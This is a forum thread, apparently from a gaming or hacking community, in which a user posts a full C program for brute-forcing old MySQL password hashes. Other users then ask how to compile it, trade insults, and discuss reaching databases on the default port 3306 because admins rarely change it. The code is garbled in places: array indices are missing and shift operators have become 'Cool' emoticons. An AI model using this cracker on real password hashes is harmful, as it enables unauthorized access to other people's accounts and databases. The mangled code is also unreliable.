Jump to content

Recommended Posts

Posted

there is.

 

Brute:

Tool:

/* This program is public domain. Share and enjoy.

*

* Example:

* $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast

* $ mysqlfast 6294b50f67eda209

* Hash: 6294b50f67eda209

* Trying length 3

* Trying length 4

* Found pass: barf

*

* The MySQL password hash function could be strengthened considerably

* by:

* - making two passes over the password

* - using a bitwise rotate instead of a left shift

* - causing more arithmetic overflows

*/

 

#include <stdio.h>

 

typedef unsigned long u32;

 

/* Allowable characters in password; 33-126 is printable ascii */

#define MIN_CHAR 33

#define MAX_CHAR 126

 

/* Maximum length of password */

#define MAX_LEN 12

 

#define MASK 0x7fffffffL

 

int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)

{

 int i, c;

 u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;

 u32 newstate1, newstate2, newstate3;

 u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];

 u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];

 i = -1;

 sum = 7;

 state1_ary[0] = 1345345333L;

 state2_ary[0] = 0x12345671L;

 

 while (1) {

   while (i < stop) {

     i++;

     pass_ary = MIN_CHAR;

     step_ary = (state1_ary & 0x3f) + sum;

     xor_ary = step_ary*MIN_CHAR + (state1_ary << Cool;

     sum += MIN_CHAR;

     state1_ary[i+1] = state1_ary ^ xor_ary;

     state2_ary[i+1] = state2_ary

       + ((state2_ary << Cool ^ state1_ary[i+1]);

   }

 

   state1 = state1_ary[i+1];

   state2 = state2_ary[i+1];

   step = (state1 & 0x3f) + sum;

   xor1 = step*MIN_CHAR + (state1 << Cool;

   xor2 = (state2 << Cool ^ state1;

 

   for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {

     newstate2 = state2 + (xor1 ^ xor2);

     newstate1 = state1 ^ xor1;

 

     newstate3 = (targ2 - newstate2) ^ (newstate2 << Cool;

     div = (newstate1 & 0x3f) + sum + c;

     diff = ((newstate3 ^ newstate1) - (newstate1 << Cool) & MASK;

     if (diff % div != 0) continue;

     d = diff / div;

     if (d < MIN_CHAR || d > MAX_CHAR) continue;

 

     div = (newstate3 & 0x3f) + sum + c + d;

     diff = ((targ1 ^ newstate3) - (newstate3 << Cool) & MASK;

     if (diff % div != 0) continue;

     e = diff / div;

     if (e < MIN_CHAR || e > MAX_CHAR) continue;

 

     pass_ary[i+1] = c;

     pass_ary[i+2] = d;

     pass_ary[i+3] = e;

     return 1;

   }

 

   while (i >= 0 && pass_ary >= MAX_CHAR) {

     sum -= MAX_CHAR;

     i--;

   }

   if (i < 0) break;

   pass_ary++;

   xor_ary += step_ary;

   sum++;

   state1_ary[i+1] = state1_ary ^ xor_ary;

   state2_ary[i+1] = state2_ary

     + ((state2_ary << Cool ^ state1_ary[i+1]);

 }

 

 return 0;

}

 

void crack(char *hash)

{

 int i, len;

 u32 targ1, targ2, targ3;

 int pass[MAX_LEN];

 

 if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) {

   printf("Invalid password hash: %s\n", hash);

   return;

 }

 printf("Hash: %08lx%08lx\n", targ1, targ2);

 targ3 = targ2 - targ1;

 targ3 = targ2 - ((targ3 << Cool ^ targ1);

 targ3 = targ2 - ((targ3 << Cool ^ targ1);

 targ3 = targ2 - ((targ3 << Cool ^ targ1);

 

 for (len = 3; len <= MAX_LEN; len++) {

   printf("Trying length %d\n", len);

   if ( crack0(len-4, targ1, targ3, pass) ) {

     printf("Found pass: ");

     for (i = 0; i < len; i++)

       putchar(pass);

     putchar('\n');

     break;

   }

 }

 if (len > MAX_LEN)

   printf("Pass not found\n");

}

 

int main(int argc, char *argv[])

{

 int i;

 if (argc <= 1)

   printf("usage: %s hash\n", argv[0]);

 for (i = 1; i < argc; i++)

   crack(argv);

 return 0;

}

 

But how to compile it?

 

its look like C/C++, try download pelles and compile it

Posted

Omg guys ... i have asked lot of ppls that know how to do it to explain me a little or help me through PM ... w/e im trying 12 hours now without stop and i didnt made it . .. . nones want to help me .. . :'( :'( :'(

Posted

Lol darkslayer you ask if i can advertive your server in overdose server, and i m doing bullsh1ts? kkthxbb..

 

Vote For Ban ExTrEmEDwarf

YES -> 1029 PPL

NO -> 2 PPL

ok i go ask ban I NEVER ASKED TO ADVERTISE MY SERVER IDIOT
Posted

really? Devc++ is a program to compile... you just say the type of test kkthxbb

 

its logic if code is in C u will use PASCAL to compile it ?

just think sometimes,

Posted

Yes i can see because TheEnd show me by msn... that is why i post it! NOOB go translater before you post your english sux!

I never show it to you .....

 

Posted

I never show it to you .....

 

dont worry he tells same shits for everybody he tell that i told him to advertise my srv in overdose topic wtf he suck balls i asked from nitrous to ban him .. i wait for an answer
Posted

[hide][/hide]

So, if we find an open port, and we know the pass and the username of the connection, will we be able to connect to the Database?

Or we can only connect via Port 3306?

Posted

[hide] 

So, if we find an open port, and we know the pass and the username of the connection, will we be able to connect to the Database?

Or we can only connect via Port 3306?

nO YUO HAVE TO FIND mYSQL port.. Deafaut is 3306

Posted

So, would anyone bother to change the MySQL port?

Most admins keep the default port, right?

yeah.

Guest
This topic is now closed to further replies.

×
×
  • Create New...